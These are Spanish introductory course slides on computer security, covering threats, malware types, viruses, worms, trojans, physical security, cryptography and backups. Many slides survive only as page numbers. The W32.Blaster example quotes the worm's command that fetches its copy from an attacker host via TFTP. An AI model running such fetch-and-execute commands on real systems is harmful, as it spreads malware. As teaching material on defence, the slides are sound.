Introducción a la seguridad informática

Seguridad y alta disponibilidad - UF1.NF1: Introducción a la seguridad informática

1. INTRODUCCIÓN

¿Qué activos se deben proteger? • Hardware: estaciones de trabajo, servidores, routers, switches, firewalls, centralitas privadas de telefonía, …

• Software: sistemas operativos y aplicaciones, firmware de los dispositivos de red. • Datos: almacenados y transferidos a través de una red privada ó pública.

¿Cómo se protegen estos activos? • Seguridad física: se definen métodos para garantizar la seguridad del hardware

• Seguridad lógica: se definen métodos para garantizar la seguridad del software y de los datos

Definiciones: •  Amenaza una persona, cosa, evento o idea que supone algún peligro para un activo (en términos de

confidencialidad, integridad, disponibilidad o uso legítimo) • Ataque: es la realización de una amenaza. • Defensas: medidas de protección ante las amenazas. • Vulnerabilidades: puntos débiles en las defensas o inexistencia de éstas.

1


1. INTRODUCCIÓN

2


1. INTRODUCCIÓN

Riesgo Medida del coste de una vulnerabilidad (teniendo en cuenta la ejecución de un ataque exitoso). El riesgo es

alto si valor_activo*probailidad_exito_ataque es elevada. El riesgo es bajo si valor_activo*probailidad_exito_ ataque es bajo. Ejemplo de modelo para la valoración del riesgo de un activo

Metodologías para valoración de riesgos: • CERT

• Microsoft • NIST

3


1. INTRODUCCIÓN

¿Es posible proteger totalmente un activo? Cuatro condiciones son necesarias para considerar que un activo informático está asegurado casi al 100%:

• Confidencialidad: la información es almacenada o enviada a través de la red oculta para cualquier usuario excepto para el destinatario final. Se suele garantizar la confidencialidad con el cifrado de la información.

• Autenticación: la persona, proceso o activo que acceda a la información debe previamente ser autenticado. La autenticación puede conseguirse mediante uno (o más de uno) de los siguientes factores:

• Integridad: protección de datos ante la modificación de la información. Este servicio se facilita mediante un mecanismo de criptografía denominado Message Authentication Code o firma digital.

• No repudio: cualidad por la que una persona u ordenador no puede negar haber realizado una transmisión.

Modelo de red segura

4


2. AMENAZAS

Amenazas físicas Dentro de las amenazas físicas podemos englobar cualquier error o daño en el hardware que se puede presentar

en cualquier momento. Por ejemplo, daños en discos duros, en los procesadores, errores de funcionamiento de la memoria, etc. Todos ellos hacen que la información o no esté accesible o no sea fiable. Otro tipo de amenazas físicas son las catástrofes naturales. Por ejemplo hay zonas geográficas del planeta en las que las probabilidades de sufrir terremotos, huracanes, inundaciones, etc, son mucho mas elevadas. En estos casos en los que es la propia Naturaleza la que ha provocado el desastre de seguridad, no por ello hay que descuidarlo e intentar prever al máximo este tipo de situaciones. Hay otro tipo de catástrofes que se conocen como de riesgo poco probable. Dentro de este grupo tenemos los taques nucleares, impactos de meteoritos, etc. y que, aunque se sabe que están ahí, las probabilidades de que se desencadenen son muy bajas y en principio no se toman medidas contra ellos.

Windsord

Indonesia Robos

Fokushima

Corte eléctrico 5


2. AMENAZAS

Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE) Existen desde mediados de los ’80. Inicialmente la distribuciyn se realizaba a partir de la tecnología de

intercambio de información más popular: el diskette. Desde entonces, los avances en las tecnologías de redes y en los diversos servicios de intercambio de informaciyn han sido aprovechados por formas diversas de “cydigo malicioso”: • Virus: malware que tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados

con el código de este. Los virus informáticos tienen, básicamente, la función de propagarse a través de un software, no se replican a sí mismos porque no tienen esa facultad como el gusano informático, son muy nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos • Spyware: Programas espía que recopilan información sobre una persona o una organización sin su

conocimiento. Esta información luego puede ser cedida o vendida a empresas publicitarias. Pueden recopilar información del teclado de la víctima pudiendo así conocer contraseña o nº de cuentas bancarias o pines. • Adware: Programas que abren ventanas emergentes mostrando publicidad de productos y servicios. Se suele utilizar para subvencionar la aplicación y que el usuario pueda bajarla gratis u obtener un descuento. Normalmente el usuario es consciente de ello y da su permiso.

• Worms (“Gusanos”): tienen la capacidad de replicarse a si mismos y son independientes de otros programas o componentes de software. Infectan todos los host de una red gracias a la infraestructura de datos actual.

• Troyanos. Programas con “doble cara”: exterior benigno, interior destructivo. Al ejecutar el programa el usuario suele ser distraído por un programa afable mientras que en background se está ejecutando otra aplicación con fines dudosos, generalmente suele ser una puerta trasera o backdoor.

• Phising: Intenta conseguir información confidencial de forma fraudulenta (conseguir contraseñas o pines bancarios) haciendo una suplantación de identidad. Para ello el estafador se hace pasar por una persona o

empresa de la confianza del usuario mediante un correo electrónico oficial o mensajería instantánea, y de esta forma conseguir la información. • Spam: Recepción de mensajes no solicitados. Se suele utilizar esta técnica en los correos electrónicos, mensajería instantánea y mensajes a móviles.

• Bots: programas que realizan de forma automática acciones que podría hacer una persona. Crear usuarios irreales en webs, realizar ataques de diccionario o fuerza bruta, …

6


2. AMENAZAS

Amenazas lógicas: código Malicioso o MALWARE (MAlicious softWARE) La palabra “hacker” originalmente no tenía una connotaciyn negativa: “personas que disponían de un elevado

conocimiento tecnolygico sobre ordenadores”. La acepciyn actual del término tiene su origen el los años 50 y 60, cuando el acceso a los ordenadores era muy caro y muy limitado y, por lo tanto, la disponibilidad de tiempo de proceso estaba altamente controlada. El colectivo hacker no es homogéneo: • White Hat o ethical hackers: hackers especializados en metodologías de penetración cuyo objetivo es mejorar la seguridad de los sistemas informáticos de las empresas. También conocidos como sneakers.

• Black Hat: hackers que vulneran los sistemas informáticos con intenciones maliciosas o de lucro personal. • Grey Hat: es una combinación de White y Black Hat. Hacker que vulnera un sistema informático y se ofrece a la empresa para solucionar el problema.

•,

Scipt Kiddies: hackers con bajos conocimientos que explotan las vulnerabilidades de los sistemas informáticos con herramientas de terceros. •

Hacktivist, Blue Hat, Neophyte, …

7


2. AMENAZAS

Fases del ataque de un hacker

8


2. AMENAZAS

Ejemplo de Ataque Parameter Tampering: UNICODE (Práctica)

9


2. AMENAZAS


10


2. AMENAZAS


11


2. AMENAZAS


12


2. AMENAZAS

Virus El primer virus catalogado como tal, Brain virus, escrito por Basit y Amjad Alvi en Pakistan, apareció en el año

1986. Estos virtuosos desarrolladores de software crearon a Brain con la única intención de proteger, ante el emergente "pirateo", los programas que ellos mismos creaban y comercializaban en su tienda Brain Computer Services. No tenía payload. Este virus, inusualmente dañino fue problemático para los usuarios del sistema operativo MS-DOS. Se alojaba en el Boot o sector de arranque de los disquetes de 5.25 pulgadas que contenían el sistema operativo en una versión inferior a la 2.0, En una primera instancia, cambiaba la etiqueta de volumen en los disquetes por la de (c)Brain o similar (atendiendo a la versión) y antes de producir la infección mostraba el siguiente mensaje:

¿Cómo se replican los virus?

Memory Chicks.exVirus Hard Drive

Draw.exe Calc.exe Chicks.exVirus

13


2. AMENAZAS


Memory Chicks.exVirus Hard Drive

Chicks.exVirus Draw.exe Calc.exe Chicks.exVirus

Chicks.exVirus

Memory Virus Hard Drive Draw.exe Calc.exe

Chicks.exVirus


2. AMENAZAS


Chicks.exVirus

Chicks.exVirus

MemoryCalc.exe Virus Hard Drive Draw.exe Calc.exeVirus

Chicks.exVirus

Memo Virus Hard DriveDraw.exe Calc.exeVirus

Chicks.exVirus


2. AMENAZAS

Payload La gran mayoría de virus no contienen payload, efectos secundarios intencionados, generalmente impiden

la ejecución del fichero infectado solamente. Los payloads más comunes son: •

Modificar Datos •

Exportar Datos •

Grabar voz y exportar •

Capturas de teclado y exportar •

Interceptar comunicaciones y exportar •

Cifrado de los datos locales •

Destrucción de los datos locales •

Marcado telefónico •

Insertar otro código malicioso •

Exportar Passwords

Existen más de 70.000 virus distintos, pero los más comunes son los basados en WIN32.

Técnicas de ocultación de los virus • Cifrado

• Stealth: habilidad para devolver información falsa y así no ser detectados

• Retrovirus: atacan directamente al software antivirus. Normalmente borran, cambian las firmas o paran los

servicios del antivirus. • Polimorfismo: habilidad de mutar cada vez que infectan una aplicación, disco o documento. Algunos pueden

llegar a tener hasta millones de formas diferentes. Este tipo de virus es más difícil de detectar por los antivirus.

Stealth Virus

La casa está por allí…

Todo parece

estar bien

16


2. AMENAZAS

Antivirus Los Antivirus utilizan firmas de virus para la identificación. Esta firmas son únicas para cada virus, como la

huella digitales son únicas para los humanos. El antivirus tiene una base de datos de firmas que se va actualizando. Heurística: técnicas que se emplean para conocer código malicioso que no se encuentra en su base de datos. Su importancia radica en el hecho de ser la única defensa automática posible frente a la aparición de nuevos códigos maliciosos de los que no se posea firmas. Un antivirus está formado por las firmas o definiciones de virus, motor y la aplicación. Para saber si tu antivirus está funcionando correctamente crea un fichero .txt con el siguiente contenido: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*. No es un virus real, pero tu antivirus lo detectará como tal. (www.eicar.com)

Métodos de análisis de virus BlackBox

1. Se instalan varios programas de monitorización: monitorización del sistema de ficheros, registro, memoria, actividad en la red, … 2. Se ejecuta el virus 3. Se comprueban los resultados de los programas de monitorización

17


2. AMENAZAS

Métodos de análisis de virus WhiteBox

Script virus son normalmente fáciles: se analiza el contenido de los scripts Macro virus son normalmente fáciles: se extrae el código macro del documento. Se analiza el contenido de las macros El codigo Binario puede ser complicado: programa Disassemble main()

{ demo.c printf ("Demo \n");

return 0; Compilador

}

demo.exe 0E 1F BA 0E 00 B4 09 CD 21 B8 Demo

demo.exe 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07 00 00 00 83 C4 04 33 C0 5D C3 93 11 04 55

4C CD 21 54 68 69 73 20 70 72 6F 67

72

61 6D 20 63 61 6E 6E 6F 55 8B EC 68 30 70 40 00 E8 07

00 00 00 83 C4 04 33 C0 5D C3 demo.c1 04 55 Tenemos la necesidad de dar

Assembler 3591:0000 0E PUSH CS

información detallada tan rápido como sea posible a nuestro clientes: • WhiteBox es más lento pero más detallado y exacto

• BlackBox es más rápido pero menos detallado y exacto

main() { printf ("Demo de postgrado \n")

return 0; }

3591:0001 1F POP DS 3591:0002 BA0E00 MOV DX,000E 3591:0005 B409 MOV AH,09 3591:0007 CD21 INT 21 3591:0009 B8014C MOVAX,4C01 3591:000C CD21 INT 21

18


2. AMENAZAS

Worms (gusanos) Un worm es un programa que se copia de un PC a otro. A diferencia de los virus, los worms no son parásitos

y no necesitan un host para infectar. Conocen la red y/o Internet. Se expanden a muchos PCs muy rápido . Necesitan menos intervención del humano para replicarse. Ejemplos: VBS.LoveLetter.A ; SQLexploit, Blaster ...

ILOVEYO LISA !!! ILILOVEYOU

ILOVEYO

ILOVEYOU YOU

ILOVEYOU OU

ILOV

Payload

VEY ILOV

Steve acaba de enviar LoveLetter a todos en su libreta de direcciones

• Expande el worm a TODO EL MUNDO en tu Microsoft Outlook address book vía Email o por mIRC (Internet Chat): a todos tus amigos, todos en tu empresa, todos tus clientes…

• Sobrescribe tus ficheros locales/red con las siguientes extensiones con el código del worm y añade la extensión VBS vbs, vbe, js, js, jse, css, wsh, sct, hta, jpg, jpeg, wav, txt, gif, doc, htm, html, xls, ini, bat, com,

mp3 and mp2 (Ejemplo. hello.gif -> hello.gif.vbs) • Cambia la pagina de inicio de Microsoft Internet Explorer para bajar Password Stealer Trojan. Tu información

RAS, ISP se envía al hacker. Modificaciones del Registro: sistema inestable debido a los cambios en el registro

19


2. AMENAZAS

¿Cómo se replican los gusanos? (Buffer overflow) Es un error de soFware que se produce cuando un programa no controla adecuadamente la canJdad de datos que se

copian sobre un área de memoria reservada a tal efecto (buffer), de forma que si dicha canJdad es superior a la capacidad preasignada los bytes sobrantes se almacenan en zonas de memoria adyacentes, sobrescribiendo su contenido original. Esto consJtuye un fallo de programación. En las arquitecturas comunes de computadoras no existe separación entre las zonas de memoria dedicadas a datos y las dedicadas a programa, por lo que los bytes que desbordan el buffer podrían grabarse donde antes había instrucciones, lo que implicaría la posibilidad de alterar el flujo del programa, llevándole a realizar operaciones imprevistas por el programador original. Esto es lo que se conoce como una vulnerabilidad.

Es el área de memoria que se usa para mantener temporalmente la información. La pila del pc es un área de memoria re-escribible que dinámicamente se encoge o estira según lo necesite o determine el programa en ejecución. La acción de poner y quitar información de la pila funciona como LIFO. (Last In, First Out) Para prevenir BufferOverflows: •

El usuario necesita que se saque un parche •

Los desarrolladores deberían escribir código si errores •

Análisis de código buscando código sospechoso • Compiladores que buscan o previenen stack overflows

20


2. AMENAZAS

Ejemplo de ataque: W32.Blaster El pc infectado busca por la red pc´s que estén escuchando en el puerto 135

Cuando descubre un PC escuchando el puerto 135 , el pc atacante intenta explotar el RPC Buffer Overflow

El Buffer Overflow incluye código que hace que la victima abra un command shell , y se ponga a escuchar al puerto 4444

El el atacante empieza un TFTP en el puerto 69 (el cliente TFTP esta incluido en las instalaciones por defecto), conecta al puerto 4444 y lanza el comando “tftp attacker-IP GET msblast.exe”

21


2. AMENAZAS

Ejemplo de ataque: W32.Blaster El cual ejecuta la victima, y entonces se baja una copia del worm desde el atacante.A continuación lo ejecuta

(el puerto 4444 no permanece abierto)

La victima es ahora un atacante y empieza su proceso de búsqueda, la máquina atacante primera, vuelve a la búsqueda otra vez.

22


2. AMENAZAS

¿Es difícil hacer un virus/gusano? En Internet se pueden encontrar herramientas para generar tus propios virus o worms

23


2. AMENAZAS

Troyanos Código que generalmente muestra una aplicación afable al usuario y que de forma paralela ejecuta otra maliciosa

en background. Esta aplicación maliciosa suele abrir un puerto de conexión para que un hacker pueda conectarse a la máquina infectada (backdoor) o lanza una conexión cliente contra el server de un hacker con el mismo propósito.

24


2. AMENAZAS

Troyanos ¿Es difícil crear un troyano?

Esheep.exe

25


2. AMENAZAS

Las amenazas mixtas Ahora el código malware utiliza varios métodos para expandirse (mail, Irc, red, ...) y cada vez necesitan menos la

interacción del usuario, como hacer doble click en el fichero adjunto. Algunos ejemplos de amenazas mixtas son: Codered , nimda, bugbear.B

26


2. AMENAZAS

Las amenazas mixtas

27


2. AMENAZAS

Las amenazas mixtas

28


2. AMENAZAS

Las amenazas mixtas

29


2. AMENAZAS

Las amenazas mixtas

30


3. SEGURIDAD FÍSICA

Consiste en la aplicación de barreras físicas y procedimientos de control como medidas de prevención y contramedidas contra las amenazas a los recursos y la información confidencial. En muchas organizaciones se suelen tomar medidas para prevenir o detectar accesos no autorizados o negaciones de servicio, pero rara vez para prevenir la acción de un atacante que intenta acceder físicamente a la sala de operaciones o al lugar donde se depositan las impresiones del sistema. Esto motiva que en determinadas situaciones un atacante se decline por aprovechar vulnerabilidades físicas en lugar de lógicas, ya que posiblemente le sea más fácil robar una cinta con una imagen completa del sistema que intentar acceder a él mediante fallos en el software. En entornos habituales suele ser suficiente con un poco de sentido común para conseguir una mínima seguridad física; de cualquier forma, en cada institución se ha de analizar el valor de lo que se quiere proteger y la probabilidad de las amenazas potenciales, para en función de los resultados obtenidos diseñar un plan de seguridad adecuado. Por ejemplo, en una empresa ubicada en Valencia quizás parezca absurdo hablar de la prevención ante terremotos (por ser esta un área de bajo riesgo), pero no sucederá lo mismo en una universidad situada en una zona sísmicamente activa; de la misma forma, en entornos de I+D es absurdo hablar de la prevención ante un ataque nuclear, pero en sistemas militares esta amenaza se ha de tener en cuenta. Amenazas al hardware de una instalación informática: • Acceso físico a los sistemas con autenticación basado en algo que el usuario sabe (clave), posee (tarjeta)

o/y es (biometría). Los sistemas, equipos de comunicación, cableado troncal y conexión con los proveedores de servicio de voz y datos deben estar cerrados bajo llave en un recinto acondicionado climatológicamente (CPD-Centro de procesado de Datos) con un sistema de autenticación basado en al menos uno de los métodos mencionados. Otros: videocámaras, alarmas, detectores de presencia y térmicos, …

• Desastres naturales: terremotos, tormentas eléctricas, inundaciones, incendios, humedad, ruido eléctrico, temperaturas extremas, … Como medida de prevenciyn se aconseja realizar backups periódicamente de la información y trasladarla físicamente a otro lugar.

Es importante mantener a los empleados y al personal de seguridad alerta ante ataques de ingeniería social, shoulder surfing, masquerading, scavenging y actos delictivos.

31


3. SEGURIDAD FÍSICA

32


4. SEGURIDAD LÓGICA

Seguridad en el uso de software y los sistemas, la protección de los datos, procesos y programas, así como la del acceso ordenado y autorizado de los usuarios a la información. Objetivos: • Restringir el acceso a los programas y archivos.

• Asegurar que los operadores puedan trabajar sin una supervisión minuciosa y no puedan modificar los programas ni los archivos que no correspondan.

• Asegurar que se estén utilizados los datos, archivos y programas correctos en y por el procedimiento correcto. • Que la información transmitida sea recibida sólo por el destinatario al cual ha sido enviada y no a otro. • Que la información recibida sea la misma que ha sido transmitida. • Que existan sistemas alternativos secundarios de transmisión entre diferentes puntos. • Que se disponga de pasos alternativos de emergencia para la transmisión de información.

CRIPTOGRAFÍA Cuanto mayor es la longitud de la clave menor es la probabilidad de crackeo

33



CRIPTOGRAFÍA

Confidencialidad en las comunicaciones

IDEA, RC5, DES, 3DES, AES

34



CRIPTOGRAFÍA

Confidencialidad en las comunicaciones

Diffie-‐Hellman, RSA, Massey-‐Omura, Elgamal, Miller

35



CRIPTOGRAFÍA

Confidencialidad en las comunicaciones Se pueden definir como documentos digitales firmados por una enJdad tercera confiable (PKI)que conJene una clave privada totalmente transparente para el usuario, y que conJenen información sobre este, compuestos ademas por una clave publica, donde aparece información del propietario de dicha clave. Con lo anterior, lo que se pretende es asociar la clave publica con la idenJdad de una persona fisica o juridica y por lo tanto poder probar la autenJcidad del remitente de un documento firmado electronicamente.

36



CRIPTOGRAFÍA

36



CRIPTOGRAFÍA

Confidencialidad en los datos almacenados

37



CRIPTOGRAFÍA


38



CRIPTOGRAFÍA


39



CRIPTOGRAFÍA


40



CRIPTOGRAFÍA


41



CRIPTOGRAFÍA


42



CRIPTOGRAFÍA


43



CRIPTOGRAFÍA


44



CRIPTOGRAFÍA

Algoritmos de hash (integridad de los datos): no necesitan una clave

45



CRIPTOGRAFÍA

Algoritmos de hash (integridad de los datos)

46



CRIPTOGRAFÍA

Las firmas digitales garantizan la integridad y la autenticidad del mensaje: 1.  Se pasan los datos por un algoritmo de hash que genera una cadena de bits que son anexados a los datos. 2. Antes de de enviar el mensaje se cifra con un algoritmo asimétrico utilizando la clave privada del remitente. La firma digital además permite añadir un sello temporal o timestamp que permite determinar si el mensaje ha sido interceptado. Esto es importante por ejemplo en transacciones económicas.

46



ACCESO AL ORDENADOR

47



ACCESO AL ORDENADOR

48



ACCESO AL ORDENADOR

49



ACCESO AL ORDENADOR

50



ACCESO AL ORDENADOR

51



ACCESO AL ORDENADOR

52



ACCESO AL ORDENADOR

53



ACCESO AL ORDENADOR

54



ACCESO AL ORDENADOR

55



ACCESO AL ORDENADOR

56



ACCESO AL ORDENADOR

57



ACCESO AL ORDENADOR

58



ACCESO AL ORDENADOR

59



ACCESO AL ORDENADOR

60



ACCESO AL ORDENADOR

61



AUTENTICACIÓN DE LOS USUARIOS

62




63




64




65




66



BACKUPS

67



BACKUPS

68



BACKUPS

69



BACKUPS

70



BACKUPS

71

Education

Introducción a la seguridad informática